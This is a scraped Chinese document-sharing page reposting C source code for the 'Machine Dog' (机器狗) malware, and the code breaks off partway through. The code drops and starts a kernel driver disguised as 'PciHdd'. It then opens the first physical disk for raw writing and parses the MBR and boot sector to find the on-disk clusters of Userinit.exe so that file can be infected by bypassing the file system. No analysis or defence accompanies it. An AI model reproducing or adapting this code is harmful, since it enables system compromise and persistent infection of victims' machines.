机器狗源码.docx
《机器狗源码.docx》由会员分享,可在线阅读,更多相关《机器狗源码.docx(17页珍藏版)》请在冰豆网上搜索。
机器狗源码
机器狗源码(C语言的)
//Test.cpp:
定义控制台应用程序的入口点。
//
#include"stdafx.h"
//==============================================================================
#include
typedefstruct_PARTITION_ENTRY
{
UCHARactive;//能否启动标志
UCHARStartHead;//该分区起始磁头号
UCHARStartSector;//起始柱面号高2位:
6位起始扇区号
UCHARStartCylinder;//起始柱面号低8位
UCHARPartitionType;//分区类型
UCHAREndHead;//该分区终止磁头号
UCHAREndSector;//终止柱面号高2位:
6位终止扇区号
UCHAREndCylinder;//终止柱面号低8位
ULONGStartLBA;//起始扇区号
ULONGTotalSector;//分区尺寸(总扇区数)
}PARTITION_ENTRY,*PPARTITION_ENTRY;
//==============================================================================
typedefstruct_MBR_SECTOR
{
UCHARBootCode[446];
PARTITION_ENTRYPartition[4];
USHORTSignature;
}MBR_SECTOR,*PMBR_SECTOR;
//==============================================================================
typedefstruct_BBR_SECTOR
{
USHORTJmpCode;//2字节跳转指令,跳转到引导代码
UCHARNopCode;//1字节nop指令,填充用,保证跳转指令长3个字节
UCHAROEMName[8];//8字节的OEMName
//下面开始为:
BPB(BIOSParameterBlock)
USHORTBytesPerSector;//每个扇区的字节数(512102420484096)
UCHARSectorsPerCluster;//每个簇的扇区数(1248163264128)两者相乘不能超过32K(簇最大大小)
USHORTReservedSectors;//从卷的第一个扇区开始的保留扇区数目,该值不能为0,对于FAT12/FAT16,该值通常为1,对于FAT32,典型值为32
UCHARNumberOfFATs;//卷上FAT数据结构的数目,该值通常应为2,[NTFS不使用NumberOfFATs字段,必须为0]
USHORTRootEntries;//对于FAT12/FAT16,该值表示32字节目录项的数目,对于FAT32,该值必须为0;[NTFS不使用]
USHORTNumberOfSectors16;//该卷上的扇区总数,该字段可以为0,如果该字段为0,则NumberOfSectors32不能为0;对于FAT32,该字段必须为0[FAT32/NTFS不使用该字段]
UCHARMediaDescriptor;//介质类型
USHORTSectorsPerFAT16;//该字段标识一个FAT结构占有的扇区数(FAT12/FAT16),对于FAT32卷,该字段必须为0;[FAT32/NTFS不使用该字段]
USHORTSectorsPerTrack;//用于INT0x13中断的每个磁道的扇区数
USHORTHeadsPerCylinder;//用于INT0x13中断的每个柱面的磁头数
ULONGHiddenSectors;//包含该FAT卷的分区之前的隐藏扇区数
ULONGNumberOfSectors32;//该字段包含该卷上的所有扇区数目,对于FAT32,该字段不为0;FAT12/FAT16可根据实际大小是否超过65536个扇区数决定是否采用该字段;[NTFS不使用该字段]
//下面开始为:
EBPB(ExtendedBIOSParameterBlock)
ULONGSectorsPerFAT32;//对于FAT32,该字段包含一个FAT的大小,而SectorsPerFAT16字段必须为0;
}BBR_SECTOR,*PBBR_SECTOR;
#include
#definePARTITION_TYPE_NTFS0x07
#definePARTITION_TYPE_FAT320x0B
#definePARTITION_TYPE_FAT32_LBA0x0C
//==============================================================================
#defineSTR_SYSFILE_PATHTEXT("%SystemRoot%\\system32\\drivers\\pcihdd.sys")
#defineSTR_VIRFILE_PATHTEXT("%SystemRoot%\\System32\\Userinit.exe")
#defineSTR_DSKDEVICE_NAMETEXT("\\\\.\\PhysicalDrive0")
#defineSTR_HDDDEVICE_NAMETEXT("\\\\.\\PhysicalHardDisk0")
//==============================================================================
#defineIOCTL_MYDEV_BASE0xF000
#defineIOCTL_MYDEV_Fun_0xF01CTL_CODE(IOCTL_MYDEV_BASE,0xF01,METHOD_BUFFERED,FILE_ANY_ACCESS)
//==============================================================================
DWORDInstallAndStartDriver(HMODULEModuleHandle)
{
TCHARfilePath[MAX_PATH];
HANDLEfileHandle;
HRSRChSysRes;
DWORDdwWritten;
DWORDdwSysLen;
PVOIDlpSysBuf;
SC_HANDLEhSCManager;
SC_HANDLEhService;
SERVICE_STATUSsService;
DWORDerrCode=ERROR_SUCCESS;
if(
(NULL==(hSysRes=FindResource(ModuleHandle,(LPCTSTR)1001,(LPCTSTR)1001)))
||
(0==(dwSysLen=SizeofResource(ModuleHandle,hSysRes)))
||
(NULL==(lpSysBuf=LockResource(hSysRes)))
||
(0==ExpandEnvironmentStrings(STR_SYSFILE_PATH,&filePath[0],sizeof(filePath)))
||
(INVALID_HANDLE_VALUE==(fileHandle=CreateFile(filePath,GENERIC_WRITE,0,NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL)))
)
{
errCode=GetLastError();
gotoFunExit00;
}
if(
!
WriteFile(fileHandle,lpSysBuf,dwSysLen,&dwWritten,NULL)
||
!
SetEndOfFile(fileHandle)
||
!
FlushFileBuffers(fileHandle)
)
{
errCode=GetLastError();
}
CloseHandle(fileHandle);
if(ERROR_SUCCESS!
=errCode)
{
gotoFunExit01;
}
if(NULL==(hSCManager=OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS)))
{
errCode=GetLastError();
gotoFunExit01;
}
hService=CreateService(
hSCManager,
TEXT("PciHdd"),
TEXT("PciHdd"),
SERVICE_ALL_ACCESS,
SERVICE_KERNEL_DRIVER,
SERVICE_DEMAND_START,
SERVICE_ERROR_IGNORE,
filePath,
NULL,
NULL,
NULL,
NULL,
NULL
);
if(NULL!
=hService)
{
CloseServiceHandle(hService);
}
else
{
if(NULL!
=(hService=OpenService(hSCManager,TEXT("PciHdd"),SERVICE_ALL_ACCESS)))
{
ControlService(hService,SERVICE_CONTROL_STOP,&sService);
DeleteService(hService);
CloseServiceHandle(hService);
}
hService=CreateService(
hSCManager,
TEXT("PciHdd"),
TEXT("PciHdd"),
SERVICE_ALL_ACCESS,
SERVICE_KERNEL_DRIVER,
SERVICE_DEMAND_START,
SERVICE_ERROR_IGNORE,
filePath,
NULL,
NULL,
NULL,
NULL,
NULL
);
if(NULL!
=hService)
{
CloseServiceHandle(hService);
}
else
{
errCode=GetLastError();
gotoFunExit02;
}
}
if(NULL==(hService=OpenService(hSCManager,TEXT("PciHdd"),SERVICE_START)))
{
errCode=GetLastError();
gotoFunExit02;
}
StartService(hService,0,NULL);
CloseServiceHandle(hService);
FunExit02:
CloseServiceHandle(hSCManager);
FunExit01:
DeleteFile(filePath);
FunExit00:
returnerrCode;
}
//==============================================================================
DWORDStopAndDeleteDriver(VOID)
{
TCHARfilePath[MAX_PATH];
SC_HANDLEhSCManager;
SC_HANDLEhService;
SERVICE_STATUSsService;
DWORDerrCode=ERROR_SUCCESS;
if(NULL==(hSCManager=OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS)))
{
errCode=GetLastError();
gotoFunExit00;
}
if(NULL==(hService=OpenService(hSCManager,TEXT("PciHdd"),SERVICE_ALL_ACCESS)))
{
errCode=GetLastError();
gotoFunExit01;
}
ControlService(hService,SERVICE_CONTROL_STOP,&sService);
DeleteService(hService);
CloseServiceHandle(hService);
FunExit01:
CloseServiceHandle(hSCManager);
FunExit00:
ExpandEnvironmentStrings(STR_SYSFILE_PATH,&filePath[0],sizeof(filePath));
DeleteFile(filePath);
returnerrCode;
}
//==============================================================================
//感染硬盘第一个分区的指定的文件
//
//1)通过FSCTL_GET_RETRIEVAL_POINTERS获取文件数据的分布信息
//
//2)通过直接访问硬盘(\\\\.\\PhysicalHardDisk0)的的MDR和第一个分区的引导扇区得到分区参数来定位文件。
//
//3)通过对比ReadFile读取的文件数据和自己定位后直接读取所得到的文件数据,确定定位是否正确
//
//入口参数:
//要感染的文件名(完整路径)
//
//Returnvalue:
//Success->NULL
//Failed->指向出错信息的指针
//==============================================================================
DWORDWriteVirusToDisk(LPCTSTRVirusFile)
{
STARTING_VCN_INPUT_BUFFERiVcnBuf;
UCHARoVcnBuf[272];
PRETRIEVAL_POINTERS_BUFFERlpVcnBuf;
DWORDdwVcnExtents;
LARGE_INTEGERstartLcn;
PUCHARlpClusterBuf;
DWORDdwClusterLen;
UCHARdataBuf[512];
UCHARdiskBuf[512];
DWORDdataLen;
LARGE_INTEGERdiskPos;
PPARTITION_ENTRYlpPartition;
ULONGdwPartitionStart;
ULONGdwPartitionType;
PBBR_SECTORlpBootSector;
DWORDSectorsPerCluster;
HANDLEhHddDevice;
HANDLEhDskDevice;
HANDLEhVirusFile;
DWORDerrCode=ERROR_SUCCESS;
if(INVALID_HANDLE_VALUE==(hHddDevice=CreateFileA(STR_HDDDEVICE_NAME,GENERIC_READ,0,NULL,OPEN_EXISTING,0,NULL)))
{
errCode=GetLastError();
gotoFunExit00;
}
//
if(INVALID_HANDLE_VALUE==(hVirusFile=CreateFileA(VirusFile,GENERIC_READ,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_FLAG_NO_BUFFERING,NULL)))
{
errCode=GetLastError();
gotoFunExit01;
}
iVcnBuf.StartingVcn.QuadPart=0;
RtlZeroMemory(oVcnBuf,sizeof(oVcnBuf));
if(!
DeviceIoControl(hVirusFile,FSCTL_GET_RETRIEVAL_POINTERS,&iVcnBuf,sizeof(iVcnBuf),&oVcnBuf[0],sizeof(oVcnBuf),&dataLen,NULL))
{
errCode=GetLastError();
gotoFunExit02;
}
lpVcnBuf=(PRETRIEVAL_POINTERS_BUFFER)&oVcnBuf[0];
dwVcnExtents=lpVcnBuf->ExtentCount;
startLcn=lpVcnBuf->Extents[0].Lcn;
if(!
dwVcnExtents)
{
errCode=(ULONG)(-3);//文件太小,不能操作
gotoFunExit02;
}
if(startLcn.QuadPart==-1)
{
errCode=(ULONG)(-4);//该文件是压缩文件,不能操作
gotoFunExit02;
}
ReadFile(hVirusFile,dataBuf,sizeof(dataBuf),&dataLen,NULL);
//打开第一个物理硬盘
if(INVALID_HANDLE_VALUE==(hDskDevice=CreateFileA(STR_DSKDEVICE_NAME,GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,0,NULL)))
{
errCode=GetLastError();
gotoFunExit02;
}
//读取硬盘第一个扇区(MBR)
SetFilePointer(hDskDevice,0,NULL,FILE_BEGIN);
ReadFile(hDskDevice,diskBuf,sizeof(diskBuf),&dataLen,NULL);
lpPartition=&(((PMBR_SECTOR)&diskBuf[0])->Partition[0]);
if(lpPartition[0].active!
=0x80)
{
errCode=(ULONG)(-1);//分区不是启动分区
gotoFunExit03;
}
dwPartitionType=lpPartition[0].PartitionType;
if(
dwPartitionType!
=PARTITION_TYPE_FAT32
&&
dwPartitionType!
=PARTITION_TYPE_FAT32_LBA
&&
dwPartitionType!
=PARTITION_TYPE_NTFS
)
{
errCode=(ULONG)(-2);//不支持的磁盘分区
gotoFunExit03;
}
dwPartitionStart=lpPartition[0].StartLBA;
diskPos.QuadPart=dwPartitionStart*512;
//读取启动分区的第一个扇区(启动扇区)
SetFilePointer(hDskDevice,diskPos.LowPart,&diskPos.HighPart,FILE_BEGIN);
ReadFile(hDskDevice,diskBuf,sizeof(diskBuf),&dataLen,NULL);
lpBootSector=(PBBR_SECTOR)&diskBuf[0];
SectorsPerCluster=lpBootSector->SectorsPerCluster;
//根据FAT32/NTFS计算Userinit的起始簇的偏移量
diskPos.QuadPart=dwPartitionStart;
diskPos.QuadPart+=lpBootSector->ReservedSectors;
if(dwPartitionType==PARTITION_TYPE_FAT32||dwPartitionType==PARTITION_TYPE_FAT32_LBA)
{
diskPos.QuadPart+=lpBootSector->NumberOfFATs*lpBootSector->SectorsPerFAT32;
}
diskPos.QuadPart+=startLcn.QuadPart*SectorsPerCluster;
diskPos.QuadPart*=512;
//检查文件寻址
SetFilePointer(hDskDevice,diskPos.LowPart,&diskPos.HighPart,FILE_BEGIN);
ReadFile(hDskDevice,diskBuf,sizeof(diskBuf),&dataLen,NULL);
if(!
RtlEqualMemory(dataBuf,diskBuf,sizeof(diskBuf)))
{
errCode=(ULONG)(-5);//寻址文件不成功
gotoFunExit03;
}
//分配缓冲
dwClust